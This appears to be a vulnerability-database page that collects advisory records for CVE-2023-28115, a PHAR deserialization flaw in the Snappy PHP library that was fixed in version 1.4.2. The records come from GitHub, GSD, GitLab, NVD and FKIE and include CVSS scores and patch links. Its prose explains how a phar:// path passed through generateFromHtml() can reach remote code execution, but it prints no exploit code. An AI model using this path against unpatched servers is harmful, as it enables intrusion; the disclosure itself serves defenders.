developer code with vulnerable POP chains.\n\n## Occurences\n\n\u003chttps://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\u003e\n\n## References\n\n- \u003chttps://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/\u003e",
  "id": "GHSA-gq6w-q6wh-jggc",
  "modified": "2023-03-20T13:59:30Z",
  "published": "2023-03-17T18:24:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28115"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/pull/469"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/KnpLabs/snappy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-gq6w-q6wh-jggc"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PHAR deserialization allowing remote code execution"
}

GSD-2023-28115

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2023-28115

Aliases

CVE-2023-28115

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-28115",
    "id": "GSD-2023-28115"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-28115"
      ],
      "details": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.",
      "id": "GSD-2023-28115",
      "modified": "2023-12-13T01:20:46.862680Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-28115",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "snappy",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 1.4.2"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "KnpLabs"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-502",
                "lang": "eng",
                "value": "CWE-502: Deserialization of Untrusted Data"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/pull/469",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/pull/469"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-gq6w-q6wh-jggc",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c=1.4.1",
          "affected_versions": "All versions up to 1.4.1",
          "cwe_ids": [
            "CWE-1035",
            "CWE-502",
            "CWE-78",
            "CWE-937"
          ],
          "date": "2023-03-17",
          "description": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.",
          "fixed_versions": [
            "1.4.2"
          ],
          "identifier": "CVE-2023-28115",
          "identifiers": [
            "GHSA-gq6w-q6wh-jggc",
            "CVE-2023-28115"
          ],
          "not_impacted": "All versions after 1.4.1",
          "package_slug": "packagist/knplabs/knp-snappy",
          "pubdate": "2023-03-17",
          "solution": "Upgrade to version 1.4.2 or above.",
          "title": "Deserialization of Untrusted Data",
          "urls": [
            "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
            "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
            "https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/",
            "https://github.com/advisories/GHSA-gq6w-q6wh-jggc"
          ],
          "uuid": "b46ee422-ba82-48df-8d3f-ef95cf0a06d8"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.4.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2023-28115"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-502"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2",
              "refsource": "MISC",
              "tags": [
                "Release Notes"
              ],
              "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Vendor Advisory"
              ],
              "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/pull/469",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/KnpLabs/snappy/pull/469"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-03-24T16:40Z",
      "publishedDate": "2023-03-17T22:15Z"
    }
  }
}

FKIE_CVE-2023-28115

Vulnerability from fkie_nvd - Published: 2023-03-17 22:15 - Updated: 2024-11-21 07:54

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670	Product
security-advisories@github.com	https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/pull/469	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/releases/tag/v1.4.2	Release Notes
security-advisories@github.com	https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/pull/469	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/releases/tag/v1.4.2	Release Notes
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	knplabs	snappy	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "63871084-34B8-4CD8-ACEC-3EEAE2CA2EFE",
              "versionEndExcluding": "1.4.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2."
    }
  ],
  "id": "CVE-2023-28115",
  "lastModified": "2024-11-21T07:54:26.183",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-03-17T22:15:11.437",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/pull/469"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/KnpLabs/snappy/pull/469"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2023-28115 (GCVE-0-2023-28115)

GHSA-GQ6W-Q6WH-JGGC

Description

Proof of Concept

Impact

Occurences

References

GSD-2023-28115

FKIE_CVE-2023-28115

Tags

Sightings

Nomenclature